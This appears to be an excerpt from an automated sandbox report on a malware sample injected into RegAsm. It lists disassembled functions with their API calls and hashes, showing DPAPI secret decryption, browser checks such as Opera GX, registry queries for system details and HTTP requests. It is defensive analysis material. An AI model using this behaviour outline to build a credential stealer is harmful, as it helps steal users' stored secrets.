Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$H_prolog$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 757424748-3463377506
Opcode ID: b1ec59224834b8f79ed32a038f4b7da38d4618f543a9ad0f1e6d2df5f849b41d
Instruction ID: 8db632add1ead28395c1f5c726ee2788193d5f270b99ec1c59b0dc1cdd27b91c
Opcode Fuzzy Hash: b1ec59224834b8f79ed32a038f4b7da38d4618f543a9ad0f1e6d2df5f849b41d
Instruction Fuzzy Hash: C3617270801544EECB25EBA4D915BEDBBB5EB29304F10507EE406736E2DB381A09CF69

Function 0040C186 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040C18B

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221

Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86

StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040C1DE

Part of subcall function 00406242: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058F9,00000000,00000000), ref: 00406262
Part of subcall function 00406242: LocalAlloc.KERNEL32(00000040,004058F9,?,?,004058F9,00000000,?,?), ref: 00406270
Part of subcall function 00406242: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058F9,00000000,00000000), ref: 00406286
Part of subcall function 00406242: LocalFree.KERNEL32(00000000,?,?,004058F9,00000000,?,?), ref: 00406295

memcmp.MSVCRT ref: 0040C21C

Part of subcall function 004062A5: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004062C8
Part of subcall function 004062A5: LocalAlloc.KERNEL32(00000040,?,?), ref: 004062E0
Part of subcall function 004062A5: LocalFree.KERNEL32(?), ref: 004062FE

Strings

DPAPI, xrefs: 0040C216
, xrefs: 0040C247

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFile$BinaryFreeH_prologString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmp
String ID: $DPAPI
API String ID: 2477620391-1819349886
Opcode ID: 548af4ef5a68c1d15bd34a1c9f3b88a4916ae1bc9e092e19947f3fc684f09504
Instruction ID: 7c90c9c52161514f2ce6f88b14c0e6cf6dad8cdca0aeae51f6cfd95d0e4443f7
Opcode Fuzzy Hash: 548af4ef5a68c1d15bd34a1c9f3b88a4916ae1bc9e092e19947f3fc684f09504
Instruction Fuzzy Hash: EA21A272D00109ABCF10ABE5CD429EFBB79AF54314F14027BF901B11D2EA399A958699

Function 0041064B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,00426624,00000000,?,Work Dir: In memory), ref: 0041065F
HeapAlloc.KERNEL32(00000000,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,00426624,00000000,?,Work Dir: In memory,00000000,?), ref: 00410666
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,00426624,00000000,?), ref: 00410694
RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,00426624,00000000), ref: 004106B0

Strings

Windows 11, xrefs: 00410677

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: Windows 11
API String ID: 3676486918-2517555085
Opcode ID: 7cca10c1b5c7dd35db0d4f8c6a920e7d0fee12f9d646c557380bc34a9577cd99
Instruction ID: 81a682fe0d96866a8c385725fbf1601ecc6145704a13890b4f9ee07a06a14e80
Opcode Fuzzy Hash: 7cca10c1b5c7dd35db0d4f8c6a920e7d0fee12f9d646c557380bc34a9577cd99
Instruction Fuzzy Hash: F0F06879640215FBEB105BD1DD0AF9A7A7EEB45B04F101075FB01D51A0D7F499509724

Function 0040FB50 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,0040FBC2,00410673,?,?,?,00414A17,00000000,?,Windows: ,00000000), ref: 0040FB64
HeapAlloc.KERNEL32(00000000,?,?,?,0040FBC2,00410673,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,00426624), ref: 0040FB6B
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,0040FBC2,00410673,?,?,?,00414A17,00000000,?,Windows: ), ref: 0040FB89
RegQueryValueExA.KERNEL32(00000000,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,0040FBC2,00410673,?,?,?,00414A17,00000000), ref: 0040FBA4

Strings

CurrentBuildNumber, xrefs: 0040FB9C

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3676486918-1022791448
Opcode ID: 5b1574023f8c3e93d255d4511c3bb41a2e12e83297ccb6591afc91b84a13fdcf
Instruction ID: 28640ec94ffd33d2c44419ba2cf0af880b9d8ee060d027bd97fbaf1b7c2936ad
Opcode Fuzzy Hash: 5b1574023f8c3e93d255d4511c3bb41a2e12e83297ccb6591afc91b84a13fdcf
Instruction Fuzzy Hash: C9F03076240214FBFB119BD1DC0BFAE7A7DEB45B04F101069F701A50A0D7B569409B28

Function 004024D7 Relevance: 7.5, APIs: 5, Instructions: 39memorystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004024F0

Part of subcall function 0040245C: memset.MSVCRT ref: 00402481
Part of subcall function 0040245C: CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,00000000,?,00000000,00000000), ref: 004024A7
Part of subcall function 0040245C: CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,?,?,00000000,00000000), ref: 004024C1

strcat.MSVCRT(?,00000000,?,?,00000000,00000104), ref: 00402505
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00402510
RtlAllocateHeap.NTDLL(00000000), ref: 00402517

Part of subcall function 00402308: ??_U@YAPAXI@Z.MSVCRT ref: 0040238D

memset.MSVCRT ref: 00402540

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: memset$BinaryCryptHeapString$AllocateProcessstrcat
String ID:
API String ID: 3248666761-0
Opcode ID: a641902682074bfb60fea3bc3b21c2ff598bd00ccde1354f0615c18b64d23653
Instruction ID: 5936fd312f401cb4099e43ed518250dd8d8a99da873d70e406837ce1c28814d2
Opcode Fuzzy Hash: a641902682074bfb60fea3bc3b21c2ff598bd00ccde1354f0615c18b64d23653
Instruction Fuzzy Hash: BCF044B6C0021CB7CB10BBA4DD49FCA777C9F14304F0000A6BA45F2081DAB497C4CBA4

Function 0040D6BB Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 454COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040D6C0

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

StrCmpCA.SHLWAPI(00000000,Opera GX,00425C1E,00425C1B,?,?,?), ref: 0040D70A

Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D52

Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83

Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A

Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB

Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980

Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425C4E,?,?), ref: 00410CF6

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 0040A893: _EH_prolog.MSVCRT ref: 0040A898

Strings

Opera GX, xrefs: 0040D6F2
#, xrefs: 0040DBD3

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
String ID: #$Opera GX
API String ID: 2625060131-1046280356
Opcode ID: 44dd2c814d8d69ef54f548f75edc75f218f568ffebac2a73537c3cb404a88564
Instruction ID: 7bf8bd95af0ab130806eb85ed7196d5d1824f91eddb0a7e88fed5b384ee0e496
Opcode Fuzzy Hash: 44dd2c814d8d69ef54f548f75edc75f218f568ffebac2a73537c3cb404a88564
Instruction Fuzzy Hash: 47027C7190424CEADF14EBE5D956BDEBBB8AF19308F10417EE405732C2DA781B0C8B66

Function 1923FD40 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 134fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?,?), ref: 1923FE03

Strings

winRead, xrefs: 1923FE3D
delayed %dms for lock/sharing conflict at line %d, xrefs: 1923FE78

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID: FileRead
String ID: delayed %dms for lock/sharing conflict at line %d$winRead
API String ID: 2738559852-1843600136
Opcode ID: 1c7fd28dbeccf2a20f28e5a77f88d4691f4968bced93ba95d7a2a760d72d24bf
Instruction ID: 6562e0062e379c79246cee5051c74ca8ac62faeac8cc62760309e85c168acec8
Opcode Fuzzy Hash: 1c7fd28dbeccf2a20f28e5a77f88d4691f4968bced93ba95d7a2a760d72d24bf
Instruction Fuzzy Hash: 04413BB26043456BD304DE64DD85DABB7A8FF88211FDC192DF544C3640D731FA188792

Function 00413326 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041332B
lstrlenA.KERNEL32(00000000), ref: 00413348
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041340C

Strings

ERROR, xrefs: 00413406

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrlen
String ID: ERROR
API String ID: 2133942097-2861137601
Opcode ID: 3f3fd570d0b05c7d3f3f059979cdb62af6a3c7cb2d2703b08dde5580cb5467c6
Instruction ID: 1c592bd34475586d8bf3bdcea4321633edf8985e3e402502d8e97464bbd79d58
Opcode Fuzzy Hash: 3f3fd570d0b05c7d3f3f059979cdb62af6a3c7cb2d2703b08dde5580cb5467c6
Instruction Fuzzy Hash: 8C3152B1D00148AFDB00EFA9D956BDD7FB4AB15304F10807EF505A7292DB399648CBA5

Function 0041303A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041303F

Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980

Part of subcall function 00404F2A: _EH_prolog.MSVCRT ref: 00404F2F
Part of subcall function 00404F2A: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F92
Part of subcall function 00404F2A: StrCmpCA.SHLWAPI(?), ref: 00404FA6
Part of subcall function 00404F2A: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FC9
Part of subcall function 00404F2A: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FFF
Part of subcall function 00404F2A: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405023
Part of subcall function 00404F2A: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040502E
Part of subcall function 00404F2A: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040504C

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041309D

Strings

ERROR, xrefs: 004130C5
ERROR, xrefs: 0041308B

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: HttpInternet$H_prologOpenRequest$ConnectInfoOptionQuerySendlstrcpy
String ID: ERROR$ERROR
API String ID: 1120091252-2579291623
Opcode ID: 345aea7090713525bc43328569ab8dfd80e6ef4a38db32126cd76269f1d4eab7
Instruction ID: 0083d2e72e9c4a3b74dda565e39e4a0bb24369a5d23a76fc935ba894ca840aa9
Opcode Fuzzy Hash: 345aea7090713525bc43328569ab8dfd80e6ef4a38db32126cd76269f1d4eab7
Instruction Fuzzy Hash: 17210EB0900189EADB14FFA5C556BDDBBF4AF18308F50417EE80563682DB785B0CCB66

Function 00411001 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,2IA), ref: 00411019
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411034
CloseHandle.KERNEL32(00000000), ref: 0041103B

Strings

2IA, xrefs: 0041100F

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID: 2IA
API String ID: 3183270410-4174278054
Opcode ID: 30d4ffeda736fd64e0374663d8f4d70df638ccef9048597482ecb454b1010210
Instruction ID: 8552e384592846dc61b773d54a0908cfb1ecd9fdbc452b9aa5e823a114c6ff4c
Opcode Fuzzy Hash: 30d4ffeda736fd64e0374663d8f4d70df638ccef9048597482ecb454b1010210
Instruction Fuzzy Hash: 85F03079905228BBEB60AB90DC49FDD3B78AB09715F000061BE85A61D0DBB4AAC4CBD4

Function 00414437 Relevance: 6.1, APIs: 4, Instructions: 76sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041443C

Part of subcall function 00413460: _EH_prolog.MSVCRT ref: 00413465

Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 004144C0
CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$CreateObjectSingleSleepThreadWait
String ID:
API String ID: 2678630583-0
Opcode ID: 1cb46bc23d17f687b51e131ae5113430bc73b21f4a29ab7455bec2179b617caf
Instruction ID: ec526774ace028d9da9643eeb35cca1a79bf063c44aba5694452f09cb0374c28
Opcode Fuzzy Hash: 1cb46bc23d17f687b51e131ae5113430bc73b21f4a29ab7455bec2179b617caf
Instruction Fuzzy Hash: 23310D75900148AFCB11DFA4C995ADEBBB8FF18304F50412EF906A7281DB789A88CB95

Function 0040FE18 Relevance: 6.0, APIs: 4, Instructions: 35memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,004266D4), ref: 0040FE2C
HeapAlloc.KERNEL32(00000000,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,004266D4,00000000,?), ref: 0040FE33
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 0040FE51
RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 0040FE6D

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

